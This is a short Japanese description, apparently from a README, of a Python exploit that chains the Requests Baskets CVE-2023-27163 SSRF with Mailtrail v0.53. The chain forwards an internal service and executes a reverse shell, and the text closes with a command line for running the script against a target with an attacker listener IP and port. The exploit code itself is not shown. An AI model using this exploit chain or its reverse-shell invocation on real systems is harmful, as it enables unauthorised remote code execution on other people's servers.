
Pythonエクスプロイト。Requests BasketsのCVE-2023-27163 SSRFをMailtrail v0.53と連鎖させ、内部サービスを転送してリバースシェルを実行します。
以下のエクスプロイトはRequests Baskets v1.2.1 SSRF脆弱性を悪用し、127.0.0.1:80で動作している内部アプリケーションを/pwnedの外部アプリケーションへ転送します。Mailtrail v0.53アプリケーションが転送されると、リバースシェルコマンドを実行し、数秒以内にユーザーはマシン上でリバースシェルを取得できます。
python3 ./exploit http://10.10.10.10:55555 LISTENER-IP LISTENER-PORT